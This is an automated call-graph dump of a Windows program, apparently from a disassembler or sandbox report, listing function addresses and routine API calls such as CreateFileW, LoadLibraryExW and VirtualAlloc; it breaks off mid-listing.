60 API calls 99975->99978 99976->99964 99979 8ed3b2 99978->99979 100268 8e3c66 64 API calls Mailbox 99979->100268 99981->99940 99981->99964 99982 8ed3bb Mailbox 99982->99965 99984 889997 85 API calls 99983->99984 99985 8f4787 99984->99985 100339 8863a0 99985->100339 99987 8f47bc 99991 8f47c0 99987->99991 100364 889bf8 99987->100364 99988 8f4797 99988->99987 99989 88a000 332 API calls 99988->99989 99989->99987 99991->99920 99993 889bf8 60 API calls 99992->99993 99994 89213b 99993->99994 99996 8a0ff6 Mailbox 60 API calls 99994->99996 99998 8c69af 99994->99998 99997 892154 99996->99997 100000 892164 99997->100000 100001 885906 61 API calls 99997->100001 99999 892189 99998->99999 100403 8ef7df 60 API calls 99998->100403 100008 892196 99999->100008 100404 889c9c 60 API calls 99999->100404 100002 889997 85 API calls 100000->100002 100001->100000 100004 892172 100002->100004 100006 885956 68 API calls 100004->100006 100005 8c69f7 100007 8c69ff 100005->100007 100005->100008 100009 892181 100006->100009 100405 889c9c 60 API calls 100007->100405 100010 885e3f 2 API calls 100008->100010 100009->99998 100009->99999 100402 885a1a CloseHandle 100009->100402 100012 89219d 100010->100012 100014 8c6a11 100012->100014 100015 8921b7 100012->100015 100017 8a0ff6 Mailbox 60 API calls 100014->100017 100016 8877c7 60 API calls 100015->100016 100018 8921bf 100016->100018 100019 8c6a17 100017->100019 100385 8856d2 100018->100385 100021 8c6a2b 100019->100021 100406 8859b0 ReadFile SetFilePointerEx 100019->100406 100026 8c6a2f _memmove 100021->100026 100407 8e794e 60 API calls 2 library calls 100021->100407 100024 8921ce 100024->100026 100400 889b9c 60 API calls Mailbox 100024->100400 100027 8921e2 Mailbox 100028 89221c 100027->100028 100029 885dcf CloseHandle 100027->100029 100028->99920 100030 892210 100029->100030 100030->100028 100401 885a1a CloseHandle 100030->100401 100033 8a0ff6 Mailbox 60 API calls 100032->100033 100034 885916 100033->100034 100035 885dcf CloseHandle 100034->100035 100036 885921 100035->100036 100037 8877c7 60 API calls 100036->100037 100038 885929 100037->100038 100039 885dcf CloseHandle 100038->100039 100040 885930 100039->100040 100040->99920 100041->99920 100042->99920 100043->99916 100411 8d6636 100044->100411 100046 8d6702 100046->99918 100085 889997 100047->100085 100051 8fd242 100153 8fdbdc 93 API calls Mailbox 100051->100153 100053 8fce75 Mailbox 100053->99932 100055 8fd251 100058 8fd0db 100055->100058 100059 8fd25d 100055->100059 100056 8fcec6 Mailbox 100056->100053 100057 889997 85 API calls 100056->100057 100072 8fd0cd 100056->100072 100135 8ef835 60 API calls 2 library calls 100056->100135 100136 8fd2f3 62 API calls 2 library calls 100056->100136 100057->100056 100116 8fcc82 100058->100116 100059->100053 100064 8fd114 100131 8a0e48 100064->100131 100067 8fd12e 100137 8ea0b5 90 API calls 4 library calls 100067->100137 100068 8fd147 100138 88942e 100068->100138 100071 8fd139 GetCurrentProcess TerminateProcess 100071->100068 100072->100051 100072->100058 100076 8fd2b8 100076->100053 100081 8fd2cc FreeLibrary 100076->100081 100078 8fd17f 100150 8fd95d 108 API calls _free 100078->100150 100081->100053 100084 8fd190 100084->100076 100151 888ea0 60 API calls Mailbox 100084->100151 100152 889e9c 61 API calls Mailbox 100084->100152 100154 8fd95d 108 API calls _free 100084->100154 100086 8899b1 100085->100086 100095 8899ab 100085->100095 100087 8899f9 100086->100087 100088 8bf903 100086->100088 100089 8bf9fc __i64tow 100086->100089 100091 8899b7 __itow 100086->100091 100155 8a38d8 84 API calls 3 library calls 100087->100155 100096 8a0ff6 Mailbox 60 API calls 100088->100096 100101 8bf97b Mailbox _wcscpy 100088->100101 100089->100089 100093 8a0ff6 Mailbox 60 API calls 100091->100093 100094 8899d1 100093->100094 100094->100095 100097 887f41 60 API calls 100094->100097 100095->100053 100103 8fdab9 100095->100103 100098 8bf948 100096->100098 100097->100095 100099 8a0ff6 Mailbox 60 API calls 100098->100099 100100 8bf96e 100099->100100 100100->100101 100102 887f41 60 API calls 100100->100102 100156 8a38d8 84 API calls 3 library calls 100101->100156 100102->100101 100157 887faf 100103->100157 100105 8fdad4 CharLowerBuffW 100161 8df658 100105->100161 100109 8877c7 60 API calls 100110 8fdb0d 100109->100110 100168 8879ab 100110->100168 100112 8fdb24 100181 887e8c 100112->100181 100114 8fdb30 Mailbox 100115 8fdb6c Mailbox 100114->100115 100185 8fd2f3 62 API calls 2 library calls 100114->100185 100115->100056 100117 8fcc9d 100116->100117 100121 8fccf2 100116->100121 100118 8a0ff6 Mailbox 60 API calls 100117->100118 100119 8fccbf 100118->100119 100120 8a0ff6 Mailbox 60 API calls 100119->100120 100119->100121 100120->100119 100122 8fdd64 100121->100122 100123 8fdf8d Mailbox 100122->100123 100130 8fdd87 _strcat _wcscpy __wsetenvp 100122->100130 100123->100064 100124 889cf8 60 API calls 100124->100130 100125 889d46 60 API calls 100125->100130 100126 889c9c 60 API calls 100126->100130 100127 889997 85 API calls 100127->100130 100128 8a594c 59 API calls __crtLCMapStringA_stat 100128->100130 100130->100123 100130->100124 100130->100125 100130->100126 100130->100127 100130->100128 100189 8e5b29 62 API calls 2 library calls 100130->100189 100132 8a0e5d 100131->100132 100133 8a0ef5 VirtualAlloc 100132->100133 100134 8a0ec3 100132->100134 100133->100134 100134->100067 100134->100068 100135->100056 100136->100056 100137->100071 100139 889436 100138->100139 100140 8a0ff6 Mailbox 60 API calls 100139->100140 100141 889444 100140->100141 100142 889450 100141->100142 100190 88935c 60 API calls Mailbox 100141->100190 100144 8891b0 100142->100144 100191 8892c0 100144->100191 100146 8a0ff6 Mailbox 60 API calls 100148 88925b 100146->100148 100147 8891bf 100147->100146 100147->100148 100148->100084 100149 888ea0 60 API calls Mailbox 100148->100149 100149->100078 100150->100084 100151->100084 100152->100084 100153->100055 100154->100084 100155->100091 100156->100089 100158 887fc2 100157->100158 100160 887fbf _memmove 100157->100160 100159 8a0ff6 Mailbox 60 API calls 100158->100159 100159->100160 100160->100105 100162 8df683 __wsetenvp 100161->100162 100163 8df6c2 100162->100163 100166 8df6b8 100162->100166 100167 8df769 100162->100167 100163->100109 100163->100114 100166->100163 100186 887a24 62 API calls 100166->100186 100167->100163 100187 887a24 62 API calls 100167->100187 100169 8879ba 100168->100169 100170 887a17 100168->100170 100169->100170 100171 8879c5 100169->100171 100172 887e8c 60 API calls 100170->100172 100173 8879e0 100171->100173 100174 8bef32 100171->100174 100178 8879e8 _memmove 100172->100178 100188 888087 60 API calls Mailbox 100173->100188 100175 888189 60 API calls 100174->100175 100177 8bef3c 100175->100177 100179 8a0ff6 Mailbox 60 API calls 100177->100179 100178->100112 100180 8bef5c 100179->100180 100182 887e9a 100181->100182 100184 887ea3 _memmove 100181->100184 100183 887faf 60 API calls 100182->100183 100182->100184 100183->100184 100184->100114 100185->100115 100186->100166 100187->100167 100188->100178 100189->100130 100190->100142 100192 8892c9 Mailbox 100191->100192 100193 8bf5c8 100192->100193 100198 8892d3 100192->100198 100195 8a0ff6 Mailbox 60 API calls 100193->100195 100194 8892da 100194->100147 100196 8bf5d4 100195->100196 100198->100194 100199 889df0 60 API calls Mailbox 100198->100199 100199->100198 100272 885dcf 100200->100272 100204 8859a4 100204->99955 100204->99956 100205 885981 100205->100204 100284 885770 100205->100284 100207 885993 100301 8853db SetFilePointerEx SetFilePointerEx 100207->100301 100209 88599a 100209->100204 100210 8be030 100209->100210 100302 8e3696 SetFilePointerEx SetFilePointerEx WriteFile 100210->100302 100212 8be060 100212->100204 100213->99937 100215 8877c7 60 API calls 100214->100215 100216 88470f 100215->100216 100217 8877c7 60 API calls 100216->100217 100218 884717 100217->100218 100219 8877c7 60 API calls 100218->100219 100220 88471f 100219->100220 100221 8877c7 60 API calls 100220->100221 100222 884727 100221->100222 100223 8bd8fb 100222->100223 100224 88475b 100222->100224 100225 8881a7 60 API calls 100223->100225 100226 8879ab 60 API calls 100224->100226 100227 8bd904 100225->100227 100228 884769 100226->100228 100229 887eec 60 API calls 100227->100229 100230 887e8c 60 API calls 100228->100230 100233 88479e 100229->100233 100231 884773 100230->100231 100231->100233 100234 8879ab 60 API calls 100231->100234 100232 8847de 100235 8879ab 60 API calls 100232->100235 100233->100232 100236 8847bd 100233->100236 100246 8bd924 100233->100246 100237 884794 100234->100237 100241 8847ef 100235->100241 100321 887b52 100236->100321 100239 887e8c 60 API calls 100237->100239 100238 8bd9f4 100242 887d2c 60 API calls 100238->100242 100239->100233 100244 884801 100241->100244 100247 8881a7 60 API calls 100241->100247 100264 8bd9b1 100242->100264 100245 884811 100244->100245 100248 8881a7 60 API calls 100244->100248 100249 884818 100245->100249 100251 8881a7 60 API calls 100245->100251 100246->100238 100253 8bd9dd 100246->100253 100259 8bd95b 100246->100259 100247->100244 100248->100245 100252 8881a7 60 API calls 100249->100252 100261 88481f Mailbox 100249->100261 100250 8879ab 60 API calls 100250->100232 100251->100249 100252->100261 100253->100238 100255 8bd9c8 100253->100255 100254 887b52 60 API calls 100254->100264 100258 887d2c 60 API calls 100255->100258 100256 8bd9b9 100257 887d2c 60 API calls 100256->100257 100257->100264 100258->100264 100259->100256 100262 8bd9a4 100259->100262 100261->99957 100324 887d2c 100262->100324 100264->100232 100264->100254 100333 887a84 60 API calls 2 library calls 100264->100333 100335 8e4696 GetFileAttributesW 100265->100335 100268->99982 100269->99981 100270->99964 100271->99964 100273 885de8 100272->100273 100274 885962 100272->100274 100273->100274 100275 885ded CloseHandle 100273->100275 100276 885df9 100274->100276 100275->100274 100277 8be181 100276->100277 100278 885e12 CreateFileW 100276->100278 100279 885e34 100277->100279 100280 8be187 CreateFileW 100277->100280 100278->100279 100279->100205 100280->100279 100281 8be1ad 100280->100281 100303 885c4e 100281->100303 100285 88578b 100284->100285 100286 8bdfce 100284->100286 100287 88581a 100285->100287 100288 885c4e 2 API calls 100285->100288 100286->100287 100316 885e3f 100286->100316 100287->100207 100289 8857ad 100288->100289 100313 88538e 100289->100313 100293 8857c4 100294 8a0ff6 Mailbox 60 API calls 100293->100294 100295 8857cf 100294->100295 100296 88538e 60 API calls 100295->100296 100297 8857da 100296->100297 100298 885d20 2 API calls 100297->100298 100299 885807 100298->100299 100300 885c4e 2 API calls 100299->100300 100300->100287 100301->100209 100302->100212 100309 885c68 100303->100309 100304 885cef SetFilePointerEx 100311 885dae SetFilePointerEx 100304->100311 100305 8be151 100312 885dae SetFilePointerEx 100305->100312 100308 8be16b 100309->100304 100309->100305 100310 885cc3 100309->100310 100310->100279 100311->100310 100312->100308 100314 8a0ff6 Mailbox 60 API calls 100313->100314 100315 8853a0 100314->100315 100315->100286 100315->100293 100317 885c4e 2 API calls 100316->100317 100318 885e60 100317->100318 100319 885c4e 2 API calls 100318->100319 100320 885e74 100319->100320 100320->100287 100322 887faf 60 API calls 100321->100322 100323 8847c7 100322->100323 100323->100232 100323->100250 100325 887d38 __wsetenvp 100324->100325 100326 887da5 100324->100326 100328 887d4e 100325->100328 100329 887d73 100325->100329 100327 887e8c 60 API calls 100326->100327 100332 887d56 _memmove 100327->100332 100334 888087 60 API calls Mailbox 100328->100334 100330 888189 60 API calls 100329->100330 100330->100332 100332->100264 100333->100264 100334->100332 100336 8e46b1 FindFirstFileW 100335->100336 100338 8e3e7a 100335->100338 100337 8e46c6 FindClose 100336->100337 100336->100338 100337->100338 100338->99965 100338->99975 100340 887b76 60 API calls 100339->100340 100346 8863c5 100340->100346 100341 8865ca 100379 88766f 60 API calls 2 library calls 100341->100379 100343 8865e4 Mailbox 100343->99988 100346->100341 100347 8be41f 100346->100347 100348 88766f 60 API calls 100346->100348 100350 8868f9 _memmove 100346->100350 100354 887eec 60 API calls 100346->100354 100357 8be3bb 100346->100357 100361 887faf 60 API calls 100346->100361 100377 8860cc 61 API calls 100346->100377 100378 885ea1 60 API calls Mailbox 100346->100378 100380 885fd2 61 API calls 100346->100380 100381 887a84 60 API calls 2 library calls 100346->100381 100382 8dfdba 92 API calls 4 library calls 100347->100382 100348->100346 100384 8dfdba 92 API calls 4 library calls 100350->100384 100352 8be42d 100383 88766f 60 API calls 2 library calls 100352->100383 100354->100346 100356 8be443 100356->100343 100358 888189 60 API calls 100357->100358 100360 8be3c6 100358->100360 100363 8a0ff6 Mailbox 60 API calls 100360->100363 100362 88659b CharUpperBuffW 100361->100362 100362->100346 100363->100350 100365 889c08 100364->100365 100366 8bfbff 100364->100366 100370 8a0ff6 Mailbox 60 API calls 100365->100370 100367 8bfc10 100366->100367 100368 887d2c 60 API calls 100366->100368 100369 887eec 60 API calls 100367->100369 100368->100367 100374 8bfc1a 100369->100374 100371 889c1b 100370->100371 100372 889c26 100371->100372 100371->100374 100373 889c34 100372->100373 100376 887f41 60 API calls 100372->100376 100373->99991 100374->100373 100375 8877c7 60 API calls 100374->100375 100375->100373 100376->100373 100377->100346 100378->100346 100379->100343 100380->100346 100381->100346 100382->100352 100383->100356 100384->100343 100386 8856dd 100385->100386 100387 885702 100385->100387 100386->100387 100390 8856ec 100386->100390 100388 887eec 60 API calls 100387->100388 100396 8e349a 100388->100396 100391 885c18 60 API calls 100390->100391 100393 8e35ba 100391->100393 100392 8e34c9 100392->100024 100395 885632 62 API calls 100393->100395 100397 8e35c8 100395->100397 100396->100392 100408 8e3436 ReadFile SetFilePointerEx 100396->100408 100409 887a84 60 API calls 2 library calls 100396->100409 100399 8e35d8 Mailbox 100397->100399 100410 88793a 62 API calls Mailbox 100397->100410 100399->100024 100400->100027 100401->100028 100402->99998 100403->99998 100404->100005 100405->100012 100406->100021 100407->100026 100408->100396 100409->100396 100410->100399 100412 8d665e 100411->100412 100413 8d6641 100411->100413 100412->100046 100413->100412 100415 8d6621 60 API calls Mailbox 100413->100415 100415->100413 100416 8bff06 100417 8bff10 100416->100417 100448 88ac90 Mailbox _memmove 100416->100448 100557 888e34 60 API calls Mailbox 100417->100557 100421 88b685 100562 8ea0b5 90 API calls 4 library calls 100421->100562 100422 8a0ff6 60 API calls Mailbox 100443 88a097 Mailbox 100422->100443 100426 88b5d5 100428 8881a7 60 API calls 100426->100428 100438 88a1b7 100428->100438 100429 8c047f 100561 8ea0b5 90 API calls 4 library calls 100429->100561 100430 88b5da 100567 8ea0b5 90 API calls 4 library calls 100430->100567 100432 887f41 60 API calls 100432->100448 100433 8877c7 60 API calls 100433->100443 100435 8881a7 60 API calls 100435->100443 100436 8c048e 100437 8a2f80 68 API calls __cinit 100437->100443 100439 8d7405 60 API calls 100439->100443 100441 8d66f4 Mailbox 60 API calls 100441->100438 100442 8c0e00 100566 8ea0b5 90 API calls 4 library calls 100442->100566 100443->100422 100443->100426 100443->100429 100443->100430 100443->100433 100443->100435 100443->100437 100443->100438 100443->100439 100443->100442 100446 88a6ba 100443->100446 100551 88ca20 332 API calls 2 library calls 100443->100551 100552 88ba60 61 API calls Mailbox 100443->100552 100565 8ea0b5 90 API calls 4 library calls 100446->100565 100447 8d66f4 Mailbox 60 API calls 100447->100448 100448->100421 100448->100432 100448->100438 100448->100443 100448->100447 100449 88a000 332 API calls 100448->100449 100451 8c0c94 100448->100451 100453 8c0ca2 100448->100453 100456 88b37c 100448->100456 100457 8a0ff6 60 API calls Mailbox 100448->100457 100462 88b416 100448->100462 100465 88ade2 Mailbox 100448->100465 100473 8fc5f4 100448->100473 100505 8e7be0 100448->100505 100511 8fbf80 100448->100511 100558 8d7405 60 API calls 100448->100558 100559 8fc4a7 86 API calls 2 library calls 100448->100559 100449->100448 100563 889df0 60 API calls Mailbox 100451->100563 100564 8ea0b5 90 API calls 4 library calls 100453->100564 100455 8c0c86 100455->100438 100455->100441 100554 889e9c 61 API calls Mailbox 100456->100554 100457->100448 100459 88b38d 100555 889e9c 61 API calls Mailbox 100459->100555 100556 88f803 332 API calls 100462->100556 100465->100421 100465->100438 100465->100455 100466 8c00e0 VariantClear 100465->100466 100467 8f474d 332 API calls 100465->100467 100468 8fe24b 131 API calls 100465->100468 100469 8ed2e6 102 API calls 100465->100469 100470 8fe237 131 API calls 100465->100470 100471 892123 96 API calls 100465->100471 100472 885906 61 API calls 100465->100472 100553 889df0 60 API calls Mailbox 100465->100553 100560 8d7405 60 API calls 100465->100560 100466->100465 100467->100465 100468->100465 100469->100465 100470->100465 100471->100465 100472->100465 100474 8877c7 60 API calls 100473->100474 100475 8fc608 100474->100475 100476 8877c7 60 API calls 100475->100476 100477 8fc610 100476->100477 100478 8877c7 60 API calls 100477->100478 100479 8fc618 100478->100479 100480 889997 85 API calls 100479->100480 100504 8fc626 100480->100504 100481 887d2c 60 API calls 100481->100504 100482 8fc80f 100483 8fc83c Mailbox 100482->100483 100576 889b9c 60 API calls Mailbox 100482->100576 100483->100448 100485 8fc7f6 100569 887e0b 100485->100569 100487 887a84 60 API calls 100487->100504 100488 8fc811 100490 887e0b 60 API calls 100488->100490 100493 8fc820 100490->100493 100491 8881a7 60 API calls 100491->100504 100492 887c8e 60 API calls 100492->100482 100496 887c8e 60 API calls 100493->100496 100494 887faf 60 API calls 100495 8fc6bd CharUpperBuffW 100494->100495 100568 88859a 69 API calls 100495->100568 100496->100482 100497 887faf 60 API calls 100499 8fc77d CharUpperBuffW 100497->100499 100500 88c707 70 API calls 100499->100500 100500->100504 100501 889997 85 API calls 100501->100504 100502 887e0b 60 API calls 100502->100504 100503 887c8e 60 API calls 100503->100504 100504->100481 100504->100482 100504->100483 100504->100485 100504->100487 100504->100488 100504->100491 100504->100494 100504->100497 100504->100501 100504->100502 100504->100503 100506 8e7bec 100505->100506 100507 8a0ff6 Mailbox 60 API calls 100506->100507 100508 8e7bfa 100507->100508 100509 8e7c08 100508->100509 100510 8877c7 60 API calls 100508->100510 100509->100448 100510->100509 100512 8fbfab 100511->100512 100513 8fbfc5 100511->100513 100582 8ea0b5 90 API calls 4 library calls 100512->100582 100583 8fa528 60 API calls Mailbox 100513->100583 100516 8fbfd0 100517 88a000 331 API calls 100516->100517 100518 8fc031 100517->100518 100519 8fbfbd Mailbox 100518->100519 100520 8fc0c3 100518->100520 100524 8fc072 100518->100524 100519->100448 100521 8fc119 100520->100521 100522 8fc0c9 100520->100522 100521->100519 100523 889997 85 API calls 100521->100523 100603 8e7ba4 60 API calls 100522->100603 100525 8fc12b 100523->100525 100584 8e7581 60 API calls Mailbox 100524->100584 100528 887faf 60 API calls 100525->100528 100532 8fc14f CharUpperBuffW 100528->100532 100529 8fc0ec 100604 885ea1 60 API calls Mailbox 100529->100604 100531 8fc0a2 100585 88f5c0 100531->100585 100535 8fc169 100532->100535 100533 8fc0f4 Mailbox 100605 88fe40 332 API calls 2 library calls 100533->100605 100536 8fc1bc 100535->100536 100537 8fc170 100535->100537 100539 889997 85 API calls 100536->100539 100606 8e7581 60 API calls Mailbox 100537->100606 100540 8fc1c4 100539->100540 100607 889fbd 61 API calls 100540->100607 100543 8fc19e 100544 88f5c0 331 API calls 100543->100544 100544->100519 100545 8fc1ce 100545->100519 100546 889997 85 API calls 100545->100546 100547 8fc1e9 100546->100547 100608 885ea1 60 API calls Mailbox 100547->100608 100549 8fc1f9 100609 88fe40 332 API calls 2 library calls 100549->100609 100551->100443 100552->100443 100553->100465 100554->100459 100555->100462 100556->100421 100557->100448 100558->100448 100559->100448 100560->100465 100561->100436 100562->100455 100563->100455 100564->100455 100565->100438 100566->100430 100567->100438 100568->100504 100570 887e1f 100569->100570 100571 8bf173 100569->100571 100577 887db0 100570->100577 100573 888189 60 API calls 100571->100573 100575 8bf17e __wsetenvp _memmove 100573->100575 100574 887e2a 100574->100492 100576->100483 100578 887dbf __wsetenvp 100577->100578 100579 888189 60 API calls 100578->100579 100580 887dd0 _memmove 100578->100580 100581 8bf130 _memmove 100579->100581 100580->100574 100582->100519 100583->100516 100584->100531 100586 88f61a 100585->100586 100587 88f7b0 100585->100587 100588 8c4848 100586->100588 100589 88f626 100586->100589 100590 887f41 60 API calls 100587->100590 100591 8fbf80 332 API calls 100588->100591 100610 88f3f0 100589->100610 100592 88f6ec Mailbox 100590->100592 100596 8c4856 100591->100596 100600 8f474d 332 API calls 100592->100600 100602 8e3e73 3 API calls 100592->100602 100625 8ecde5 100592->100625 100594 88f65d 100594->100592 100595 88f790 100594->100595 100594->100596 100595->100519 100596->100595 100706 8ea0b5 90 API calls 4 library calls 100596->100706 100599 88f743 100599->100595 100705 889df0 60 API calls Mailbox 100599->100705 100600->100599 100602->100599 100603->100529 100604->100533 100605->100519 100606->100543 100607->100545 100608->100549 100609->100519 100611 88f59a 100610->100611 100613 88f41c 100610->100613 100708 8ea0b5 90 API calls 4 library calls 100611->100708 100613->100611 100621 88f459 _memmove 100613->100621 100614 88f533 100615 88f543 100614->100615 100707 8fa5ee 86 API calls Mailbox 100614->100707 100615->100594 100617 8a0ff6 60 API calls Mailbox 100617->100621 100618 8c4823 100710 88f803 332 API calls 100618->100710 100619 88a000 332 API calls 100619->100621 100621->100614 100621->100617 100621->100618 100621->100619 100622 8c47d3 100621->100622 100623 8c47d5 100621->100623 100622->100594 100709 8ea0b5 90 API calls 4 library calls 100623->100709 100626 8877c7 60 API calls 100625->100626 100627 8ece1a 100626->100627 100628 8877c7 60 API calls 100627->100628 100629 8ece23 100628->100629 100630 8ece37 100629->100630 100844 889c9c 60 API calls 100629->100844 100632 889997 85 API calls 100630->100632 100633 8ece54 100632->100633 100634 8ece76 100633->100634 100635 8ecf55 100633->100635 100704 8ecf85 Mailbox 100633->100704 100636 889997 85 API calls 100634->100636 100711 884f3d 100635->100711 100638 8ece82 100636->100638 100640 8881a7 60 API calls 100638->100640 100643 8ece8e 100640->100643 100641 8ecf81 100642 8877c7 60 API calls 100641->100642 100641->100704 100645 8ecfb6 100642->100645 100648 8eced4 100643->100648 100649 8ecea2 100643->100649 100644 884f3d 137 API calls 100644->100641 100646 8877c7 60 API calls 100645->100646 100647 8ecfbf 100646->100647 100651 8877c7 60 API calls 100647->100651 100650 889997 85 API calls 100648->100650 100652 8881a7 60 API calls 100649->100652 100653 8ecee1 100650->100653 100654 8ecfc8 100651->100654 100655 8eceb2 100652->100655 100656 8881a7 60 API calls 100653->100656 100657 8877c7 60 API calls 100654->100657 100658 887e0b 60 API calls 100655->100658 100659 8eceed 100656->100659 100660 8ecfd1 100657->100660 100661 8ecebc 100658->100661 100845 8e4cd3 GetFileAttributesW 100659->100845 100663 889997 85 API calls 100660->100663 100664 889997 85 API calls 100661->100664 100666 8ecfde 100663->100666 100667 8ecec8 100664->100667 100665 8ecef6 100669 8ecf09 100665->100669 100671 887b52 60 API calls 100665->100671 100670 8846f9 60 API calls 100666->100670 100668 887c8e 60 API calls 100667->100668 100668->100648 100673 889997 85 API calls 100669->100673 100678 8ecf0f 100669->100678 100672 8ecff9 100670->100672 100671->100669 100675 887b52 60 API calls 100672->100675 100674 8ecf36 100673->100674 100846 8e3a2b 76 API calls Mailbox 100674->100846 100677 8ed008 100675->100677 100679 8ed03c 100677->100679 100681 887b52 60 API calls 100677->100681 100678->100704 100680 8881a7 60 API calls 100679->100680 100683 8ed04a 100680->100683 100682 8ed019 100681->100682 100682->100679 100685 887d2c 60 API calls 100682->100685 100684 887c8e 60 API calls 100683->100684 100686 8ed058 100684->100686 100687 8ed02e 100685->100687 100688 887c8e 60 API calls 100686->100688 100689 887d2c 60 API calls 100687->100689 100690 8ed066 100688->100690 100689->100679 100691 887c8e 60 API calls 100690->100691 100692 8ed074 100691->100692 100693 889997 85 API calls 100692->100693 100694 8ed080 100693->100694 100735 8e42ad 100694->100735 100696 8ed091 100697 8e3e73 3 API calls 100696->100697 100698 8ed09b 100697->100698 100699 889997 85 API calls 100698->100699 100703 8ed0cc 100698->100703 100700 8ed0b9 100699->100700 100789 8e93df 100700->100789 100847 884faa 100703->100847 100704->100599 100705->100599 100706->100595 100707->100615 100708->100622 100709->100622 100710->100622 100853 884d13 100711->100853 100716 884f68 LoadLibraryExW 100863 884cc8 100716->100863 100717 8bdd0f 100719 884faa 85 API calls 100717->100719 100720 8bdd16 100719->100720 100722 884cc8 3 API calls 100720->100722 100724 8bdd1e 100722->100724 100889 88506b 100724->100889 100725 884f8f 100725->100724 100726 884f9b 100725->100726 100728 884faa 85 API calls 100726->100728 100730 884fa0 100728->100730 100730->100641 100730->100644 100732 8bdd45 100897 885027 100732->100897 100736 8e42c9 100735->100736 100737 8e42ce 100736->100737 100738 8e42dc 100736->100738 100739 8881a7 60 API calls 100737->100739 100740 8877c7 60 API calls 100738->100740 100788 8e42d7 Mailbox 100739->100788 100741 8e42e4 100740->100741 100742 8877c7 60 API calls 100741->100742 100743 8e42ec 100742->100743 100744 8877c7 60 API calls 100743->100744 100745 8e42f7 100744->100745 100746 8877c7 60 API calls 100745->100746 100747 8e42ff 100746->100747 100748 8877c7 60 API calls 100747->100748 100749 8e4307 100748->100749 100750 8877c7 60 API calls 100749->100750 100751 8e430f 100750->100751 100752 8877c7 60 API calls 100751->100752 100753 8e4317 100752->100753 100754 8877c7 60 API calls 100753->100754 100755 8e431f 100754->100755 100756 8846f9 60 API calls 100755->100756 100757 8e4336 100756->100757 100758 8846f9 60 API calls 100757->100758 100759 8e434f 100758->100759 100760 887b52 60 API calls 100759->100760 100761 8e435b 100760->100761 100762 8e436e 100761->100762 100763 887e8c 60 API calls 100761->100763 100764 887b52 60 API calls 100762->100764 100763->100762 100765 8e4377 100764->100765 100766 8e4387 100765->100766 100767 887e8c 60 API calls 100765->100767 100768 8881a7 60 API calls 100766->100768 100767->100766 100769 8e4393 100768->100769 100770 887c8e 60 API calls 100769->100770 100771 8e439f 100770->100771 101322 8e445f 60 API calls 100771->101322 100773 8e43ae 101323 8e445f 60 API calls 100773->101323 100775 8e43c1 100776 887b52 60 API calls 100775->100776 100777 8e43cb 100776->100777 100778 8e43e2 100777->100778 100779 8e43d0 100777->100779 100781 887b52 60 API calls 100778->100781 100780 887e0b 60 API calls 100779->100780 100782 8e43dd 100780->100782 100783 8e43eb 100781->100783 100786 887c8e 60 API calls 100782->100786 100784 8e4409 100783->100784 100785 887e0b 60 API calls 100783->100785 100787 887c8e 60 API calls 100784->100787 100785->100782 100786->100784 100787->100788 100788->100696 100790 8e93ec __write_nolock 100789->100790 100791 8a0ff6 Mailbox 60 API calls 100790->100791 100792 8e9449 100791->100792 100793 88538e 60 API calls 100792->100793 100794 8e9453 100793->100794 100795 8e91e9 GetSystemTimeAsFileTime 100794->100795 100796 8e945e 100795->100796 100797 885045 86 API calls 100796->100797 100798 8e9471 _wcscmp 100797->100798 100799 8e9495 100798->100799 100800 8e9542 100798->100800 101354 8e99be 100799->101354 100802 8e99be 97 API calls 100800->100802 100817 8e950e _wcscat 100802->100817 100805 88506b 75 API calls 100807 8e9567 100805->100807 100806 8e954b 100806->100703 100808 88506b 75 API calls 100807->100808 100810 8e9577 100808->100810 100809 8e94c3 _wcscat _wcscpy 101361 8a432e 59 API calls __wsplitpath_helper 100809->101361 100811 88506b 75 API calls 100810->100811 100813 8e9592 100811->100813 100814 88506b 75 API calls 100813->100814 100815 8e95a2 100814->100815 100816 88506b 75 API calls 100815->100816 100818 8e95bd 100816->100818 100817->100805 100817->100806 100819 88506b 75 API calls 100818->100819 100820 8e95cd 100819->100820 100821 88506b 75 API calls 100820->100821 100822 8e95dd 100821->100822 100823 88506b 75 API calls 100822->100823 100824 8e95ed 100823->100824 101324 8e9b6d GetTempPathW GetTempFileNameW 100824->101324 100826 8e95f9 100827 8a548b 116 API calls 100826->100827 100838 8e960a 100827->100838 100828 8e96c4 101338 8a55d6 100828->101338 100831 88506b 75 API calls 100831->100838 100838->100806 100838->100828 100838->100831 101325 8a4a93 100838->101325 100844->100630 100845->100665 100846->100678 100848 884fb4 100847->100848 100850 884fbb 100847->100850 100849 8a55d6 __fcloseall 84 API calls 100848->100849 100849->100850 100851 884fca 100850->100851 100852 884fdb FreeLibrary 100850->100852 100851->100704 100852->100851 100902 884d61 100853->100902 100856 884d3a 100858 884d4a FreeLibrary 100856->100858 100859 884d53 100856->100859 100857 884d61 2 API calls 100857->100856 100858->100859 100860 8a548b 100859->100860 100906 8a54a0 100860->100906 100862 884f5c 100862->100716 100862->100717 101062 884d94 100863->101062 100866 884d08 100870 884dd0 100866->100870 100867 884cff FreeLibrary 100867->100866 100868 884d94 2 API calls 100869 884ced 100868->100869 100869->100866 100869->100867 100871 8a0ff6 Mailbox 60 API calls 100870->100871 100872 884de5 100871->100872 100873 88538e 60 API calls 100872->100873 100874 884df1 _memmove 100873->100874 100875 884e2c 100874->100875 100876 884ee9 100874->100876 100877 884f21 100874->100877 100878 885027 70 API calls 100875->100878 101066 884fe9 CreateStreamOnHGlobal 100876->101066 101077 8e9ba5 96 API calls 100877->101077 100886 884e35 100878->100886 100881 88506b 75 API calls 100881->100886 100882 884ec9 100882->100725 100884 8bdcd0 100885 885045 86 API calls 100884->100885 100887 8bdce4 100885->100887 100886->100881 100886->100882 100886->100884 101072 885045 100886->101072 100888 88506b 75 API calls 100887->100888 100888->100882 100890 88507d 100889->100890 100891 8bddf6 100889->100891 101101 8a5812 100890->101101 100894 8e9393 101299 8e91e9 100894->101299 100896 8e93a9 100896->100732 100898 8bddb9 100897->100898 100899 885036 100897->100899 101304 8a5e90 100899->101304 100901 88503e 100903 884d2e 100902->100903 100904 884d6a LoadLibraryA 100902->100904 100903->100856 100903->100857 100904->100903 100905 884d7b GetProcAddress 100904->100905 100905->100903 100908 8a54ac __alloc_osfhnd 100906->100908 100907 8a54bf 100955 8a8d68 59 API calls __getptd_noexit 100907->100955 100908->100907 100911 8a54f0 100908->100911 100910 8a54c4 100956 8a8ff6 9 API calls __cftog_l 100910->100956 100925 8b0738 100911->100925 100914 8a54f5 100915 8a550b 100914->100915 100916 8a54fe 100914->100916 100918 8a5535 100915->100918 100919 8a5515 100915->100919 100957 8a8d68 59 API calls __getptd_noexit 100916->100957 100940 8b0857 